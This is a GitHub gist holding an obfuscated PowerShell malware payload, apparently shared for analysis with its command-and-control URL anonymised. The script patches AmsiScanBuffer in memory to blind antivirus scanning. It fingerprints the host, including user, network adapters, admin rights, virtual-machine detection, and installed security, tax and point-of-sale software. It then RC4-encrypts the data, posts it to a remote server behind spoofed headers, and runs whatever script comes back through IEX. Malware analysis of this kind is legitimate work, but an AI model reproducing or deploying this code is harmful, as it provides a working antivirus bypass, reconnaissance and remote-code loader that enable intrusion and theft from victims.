Skip to content

Instantly share code, notes, and snippets.

@jdferrell3

jdferrell3/logfile-final-payload-anon.ps1

Created June 3, 2020 04:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save jdferrell3/2877f58645e6b68a6dc84b667fa4a703 to your computer and use it in GitHub Desktop.
Save jdferrell3/2877f58645e6b68a6dc84b667fa4a703 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
logfile-final-payload-anon.ps1
function rsrzis {
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
$ErrorActionPreference = "SilentlyContinue";
function wlc2 {
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
for ($x = 0; $x -lt $eplkztikdybroisgypg9qdbjfhmi.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$eplkztikdybroisgypg9qdbjfhmi[$x] = $eplkztikdybroisgypg9qdbjfhmi[$x] -bxor $s[$t];}
return $eplkztikdybroisgypg9qdbjfhmi
}
function inwh-rsf {
try {
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'}
if ($e){
$e[0..($e.Length-2)]-join''
}else{
"N/A"
}
}
catch {"N/A"}
finally{[GC]::Collect()}
}
function gic-jadkdp {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = '(Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)'
)
foreach ($comp in $ComputerName) {
$gibqokxyxbupwcsrtuvm_41nhwrps = '','\Wow6432Node'
foreach ($gibqokxyxbupwcsrtuvm_41nhwrp in $gibqokxyxbupwcsrtuvm_41nhwrps) {
try {
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$gibqokxyxbupwcsrtuvm_41nhwrp\Microsoft\Windows\CurrentVersion\Uninstall\$app")
$name = $program.GetValue('DisplayName')
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
function xpylubsk {
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
$string = ""
foreach($c in lwo-iqotwsu){
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
[string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
$lanconf = @{
id = $ID
ip = $ip;
mac = $macadr;
name = $lanname;
}
$string += elq-zjb $lanconf
}
$str += "|$string";
$str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption
if(([Environment]::UserName).ToLower() -eq "system"){
$str += '|True'
}
else{
$str += '|'+ $(bgf-uftc)
}
[void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$Screens = [system.windows.forms.screen]::AllScreens
foreach ($Screen in $Screens) {
$Width = $Screen.Bounds.Width
$Height = $Screen.Bounds.Height
}
$str += '|' + "$Width`x$Height"
$n = [System.Diagnostics.Process]::GetCurrentProcess()
$str += '|'+ $n.ProcessName+'|'+$n.Id
$str += '|' + $PSVersionTable.PSVersion.Major
$str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
$str += '|' + $(gb-frlg)
$str += '|' + $(dlvjj-klyzm)
$str += '|' + $yiklq5hlez['iluopvxhypju']
$str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
$str += '|' + $(inwh-rsf)
$str += '|' + $(dfiou)
$str.split('|') |% {$e += "inf%$_|"}
$e[0..($e.Length-2)]-join''
}
$j={$t=$args;[string](0..$t[0]|%{[char][int]([int][char]('&')+($t[1]).substring(($_*$t[2]),$t[2]))})-replace' '};
$yiklq5hlez = @{
aobh = "https://was/encoded/URL";
vftimreqs = 'b[CgNFd8=s9isYsBcX6|PJ+A~w?#LEKH';
fezcrocp = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.1) Gecko/20100101 Firefox/34.0';
bekeqc = 'text/html; charset=utf-8'
ficfz = 'ocsp.verisign.com';
nbducyg = 'https://www.google.com/search?ei=u_kwegrR5tZPu';
hnaofzluerdjb = '/N3203/adj/amzn.us.sr/';
dxnhecwgky = [System.Text.Encoding]::UTF8;
pref = 'jsen=';
iluopvxhypju = 'p18'
}
function bucrom {
param([string]$mfvoiqhn_12tkvf)
[Convert]::ToBase64String($(wlc2 $yiklq5hlez['dxnhecwgky'].GetBytes($mfvoiqhn_12tkvf) $yiklq5hlez['dxnhecwgky'].GetBytes($yiklq5hlez['vftimreqs'])))
}
function lwo-iqotwsu {
Get-WmiObject Win32_NetWorkAdapter -Filter 'NetConnectionStatus=2' |
ForEach-Object {
$duepjx39 = 1 | Select-Object Name, IP, MAC, ID
$duepjx39.Name = $_.Name
$duepjx39.MAC = $_.MacAddress
$duepjx39.ID = $_.DeviceID
$config = $_.GetRelated('Win32_NetWorkAdapterConfiguration')
$duepjx39.IP = $config | Select-Object -expand IPAddress
$duepjx39
}
}
function mrhgqoa19e {
param([string]$mfvoiqhn_12tkvf)
$yiklq5hlez['dxnhecwgky'].GetString($(wlc2 $([System.Convert]::FromBase64String($mfvoiqhn_12tkvf)) $yiklq5hlez['dxnhecwgky'].GetBytes($yiklq5hlez['vftimreqs'])))
}
function kuf_pgwnmrvfs {
$eplkztikdybroisgypg9qdbjfhmi = $(mxaz-somybiwzxuqy6 $yiklq5hlez['dxnhecwgky'].GetBytes($args[0]))
try{
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={1};
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
$urr = $($yiklq5hlez['aobh'] + $yiklq5hlez['hnaofzluerdjb'] + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 5 -Maximum 9)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}.{1}' -f $(. $u), $(@('jsp','asp','js')| Get-Random)))
[System.Net.HttpWebRequest] $xghopk = [System.Net.WebRequest]::Create($urr)
$xghopk.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$xghopk.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$xghopk.Timeout = 600000;
$xghopk.Method = 'POST'
$xghopk.UserAgent = $yiklq5hlez['fezcrocp']
if($PSVersionTable.CLRVersion.Major -gt 3){$xghopk.Host = $yiklq5hlez['ficfz']}
$xghopk.Headers.Add('Cookie', $yiklq5hlez['quj'])
$xghopk.ContentType = $yiklq5hlez['bekeqc']
$xghopk.Referer = $yiklq5hlez['nbducyg']
$xghopk.ContentLength = $eplkztikdybroisgypg9qdbjfhmi.Length
$hikebe = $xghopk.GetRequestStream()
$hikebe.Write($eplkztikdybroisgypg9qdbjfhmi, 0, $eplkztikdybroisgypg9qdbjfhmi.Length)
$hikebe.Flush()
$hikebe.Close()
[System.Net.HttpWebResponse] $prjryn = $xghopk.GetResponse()
$cbenfq60 = New-Object System.IO.StreamReader($prjryn.GetResponseStream())
$res = $cbenfq60.ReadToEnd()
$prjryn.Close()
if ($res) {
$duepjx39 = $(cyrokiut-qecjtgoas12 $($res))
if($duepjx39.count -gt 1){$duepjx39[1]}else{$duepjx39}
}}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();}
}
Function Write-Log {
[CmdletBinding()]
Param ([Parameter(Mandatory=$true)][string]$streamWriter, [Parameter(Mandatory=$true)][string]$infoToLog)
Process{
$InfoMessage = "$([DateTime]::Now) [INFO] $infoToLog"
$global:streamWriter.WriteLine($InfoMessage)
Write-Host $InfoMessage -ForegroundColor Cyan
}
}
function Get-ConsoleColor
{
[CmdletBinding()]
param(
)
Begin{
}
Process{
$Colors = [Enum]::GetValues([ConsoleColor])
foreach($Color in $Colors)
{
[pscustomobject] @{
ConsoleColor = $Color
}
}
}
End{
}
}
function dfiou
{
$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
$dnhcak17 = @{
ComputerName = $computer
BIOSVersion = $wmibios.Version
SerialNumber = $wmibios.serialnumber
Manufacturer = $wmisystem.manufacturer
Model = $wmisystem.model
dfiou = $false
VirtualType = $null
}
if ($wmibios.SerialNumber -like "*VMware*") {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - VMWare"
}
else {
switch -wildcard ($wmibios.Version) {
'VIRTUAL' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Hyper-V"
}
'A M I' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Virtual PC"
}
'*Xen*' {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Xen"
}
}
}
if (-not $dnhcak17.dfiou) {
if ($wmisystem.manufacturer -like "*Microsoft*")
{
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - Hyper-V"
}
elseif ($wmisystem.manufacturer -like "*VMWare*")
{
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Virtual - VMWare"
}
elseif ($wmisystem.model -like "*Virtual*") {
$dnhcak17.dfiou = $true
$dnhcak17.VirtualType = "Unknown Virtual Machine"
}
}
$resulatas += New-Object PsObject -Property $dnhcak17
return $dnhcak17.dfiou
}
function bgf-uftc
{
$tx = [Security.Principal.WindowsIdentity]::GetCurrent();
(New-Object Security.Principal.WindowsPrincipal $tx).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
function elq-zjb($ht) {
$first = $true
foreach($pair in $ht.GetEnumerator()) {
if ($first)
{
$first = $false
}
else
{
$output += ';'
}
$output+="{0}" -f $($pair.Value)
}
$output
}
function syw-alzdl {
param([string]$out)
$yiklq5hlez.add('udoeanwrgws', $($out[($out.length-33)..($out.length-2)]-join ''))
$yiklq5hlez.add('scr', $($out[0..($out.length-34)]-join ''));
}
function mxaz-somybiwzxuqy6
{
try{
sal no New-Object;
[System.IO.MemoryStream] $rascugbd240_swv = no System.IO.MemoryStream
$Deflate = no System.IO.Compression.DeflateStream $rascugbd240_swv, ([IO.Compression.CompressionMode]::Compress)
$Deflate.Write($args[0], 0, $args[0].Length );$Deflate.Close();$rascugbd240_swv.Close()
$rascugbd240_swv.ToArray()
}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();[GC]::WaitForPendingFinalizers();}
}
function dlvjj-klyzm {
try {
Get-WmiObject -Namespace "root\CIMV2" -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'}
$e[0..($e.Length-2)]-join''
}
catch {"N/A"}
finally{[GC]::Collect()}
}
function pdwkvsj {
$HashName = "MD5"
[string]$ret = ""
$hd = gwmi win32_bios
$ret = $hd["SerialNumber"].ToString()
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
$StringBuilder = New-Object System.Text.StringBuilder
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
[Void]$StringBuilder.Append($_.ToString("x2"))
}
$StringBuilder.ToString().ToLower()
}
function uydt {
try{
sal grsfqcnzf Add-Type ;
$dpa3 = @"
using System;
using System.Runtime.InteropServices;
public class kwyv
{
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
static extern IntPtr xwnou(IntPtr hModule, string procName);
[DllImport("kernel32", EntryPoint = "LoadLibrary")]
static extern IntPtr pekaon(string name);
[DllImport("kernel32", EntryPoint = "VirtualProtect")]
static extern bool gdtxpgf(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
static byte[] oul66 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] ayy56 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
public static void gofgobxy()
{
if (qsdzsh47())
Patchkwyv(oul66);
else
Patchkwyv(ayy56);
}
private static void Patchkwyv(byte[] qrlos49)
{
try
{
var zjr = "i.d";
var nvl2 = "a";
var qoa19 = "ll";
var hiww1 = "ms";
var agarmj2 = pekaon(nvl2 + hiww1 + zjr + qoa19);
if (agarmj2 == IntPtr.Zero)
{
return;
}
var dvipz2 = "nBuf";
var hkoxyur4 = "Am";
var qel29 = "s";
var srm36 = "fer";
var pjd46 = "iSca";
var ycou46 = xwnou(agarmj2, hkoxyur4 + qel29 + pjd46 + dvipz2 + srm36);
if (ycou46 == IntPtr.Zero)
{
return;
}
uint oldProtect;
gdtxpgf(ycou46, (UIntPtr)qrlos49.Length, 0x40, out oldProtect);
Marshal.Copy(qrlos49, 0, ycou46, qrlos49.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool qsdzsh47()
{
bool qsdzsh47 = true;
if (IntPtr.Size == 4)
qsdzsh47 = false;
return qsdzsh47;
}
}
"@
grsfqcnzf $dpa3
$ptr = [kwyv]::gofgobxy()
}catch {$_.Exception.Message}
}
if ($PSVersionTable.CLRVersion.Major -gt 3) {uydt}
function cyrokiut-qecjtgoas12 {
try{
[byte[]] $mfvoiqhn_12tkvf = [System.Convert]::FromBase64String($args[0])
sal np New-Object;
$ms = np System.IO.MemoryStream
$ms.Write($mfvoiqhn_12tkvf, 0, $mfvoiqhn_12tkvf.Length);
$ms.Seek(0,0);
$sr = np System.IO.StreamReader(np System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {$line}
}
catch {$_.Exception.Message|Out-Null}
finally{[GC]::Collect();[GC]::WaitForPendingFinalizers()}
}
function Test-ModuleFunction
{
[CmdletBinding()]
param ( )
begin
{
Get-CallerPreference -Cmdlet $PSCmdlet -SessionState $ExecutionContext.SessionState
}
}
function gb-frlg {
$gwiaxv29 = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime)")
$uptime = (Get-Date) - $gwiaxv29
return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
}
$yiklq5hlez.add('quj', 'winloud:' + $(bucrom $(pdwkvsj)));
if(bgf-uftc){$eb='p%1'}else{$eb='p%0'}
$de = mrhgqoa19e $(kuf_pgwnmrvfs $($($yiklq5hlez['pref'] + $(bucrom $('act%pall|'+ $eb + '|ver%'+ $yiklq5hlez['iluopvxhypju'] + '|pcn%' + $PSVersionTable.PSVersion.Major)))))
$k=$de[$de.length-1] -join ''
if ($k -eq 0) {syw-alzdl $(mrhgqoa19e $(kuf_pgwnmrvfs $($yiklq5hlez['pref'] + $(bucrom $('act%fall|'+ $(xpylubsk))))))}else{syw-alzdl $de}
IEX $yiklq5hlez['scr'];
$de=$null;$yiklq5hlez.Remove('pref');$yiklq5hlez.Remove('vftimreqs');$yiklq5hlez.Remove('iluopvxhypju');$yiklq5hlez.Remove('dxnhecwgky');$yiklq5hlez.Remove('scr')
$Error.Clear()
[GC]::Collect()
[GC]::WaitForPendingFinalizers()
orp-cjgwnnk $yiklq5hlez
}
rsrzis
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment